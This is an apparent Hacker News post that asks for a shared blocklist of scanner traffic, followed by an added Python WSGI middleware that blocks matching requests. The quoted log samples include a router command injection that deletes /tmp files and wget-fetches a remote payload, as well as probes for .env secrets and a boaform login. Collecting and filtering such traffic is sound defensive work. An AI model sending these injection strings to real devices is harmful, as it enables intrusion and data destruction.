New top story on Hacker News: Ask HN: Can we collaborate on an IP Address or Regex blacklist?

9 by usernamebias | 14 comments on Hacker News.
Hear me out. I've recently started logging pings to my services. A LOT of servers ping me constantly, checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.

    { "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" },
    { "offense": ".env", "ipAddress": "52.224.55.198" },
    { "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" }

Maybe we don't filter by IP address, and instead filter requests based on known strings (or regex). That's what I'm currently doing. Ex. If request includes '.env'. Blocked!

I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.

Like an 'ad blocklist' we can use as middleware in our HTTP applications. If something exists already, kindly point me to a GitHub.
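One way to build the string/regex filter described in the post as HTTP middleware, shown as an added example that is not part of the original post. The rule names, the patterns and the WSGI wrapper are assumptions derived from the three sample entries; the point is that matching runs on a normalized request target, so an encoded or mixed-case '.env' is caught while a path such as '/.envoy' is not.

```python
import re
from urllib.parse import unquote

# Hypothetical rule set derived from the three sample entries in the post.
# Patterns are anchored on path segments to limit false positives.
RULES = [
    ("dotenv", re.compile(r"(^|/)\.env(\.[\w-]+)?($|[/?])")),
    ("boaform-login", re.compile(r"(^|/)boaform/admin/formlogin\b")),
    ("setup-cgi-syscmd", re.compile(r"(^|/)setup\.cgi\?.*\btodo=syscmd\b")),
]

def normalize(target):
    """Percent-decode up to twice, collapse repeated slashes, lowercase."""
    for _ in range(2):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return re.sub(r"/{2,}", "/", target).lower()

def match_rule(target):
    """Return the name of the first rule matching the request target, or None."""
    norm = normalize(target)
    for name, pattern in RULES:
        if pattern.search(norm):
            return name
    return None

class BlocklistMiddleware:
    """WSGI middleware that answers 403 when the request target matches a rule."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        target = environ.get("PATH_INFO", "")
        if environ.get("QUERY_STRING"):
            target += "?" + environ["QUERY_STRING"]
        if match_rule(target):
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"blocked\n"]
        return self.app(environ, start_response)
```
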
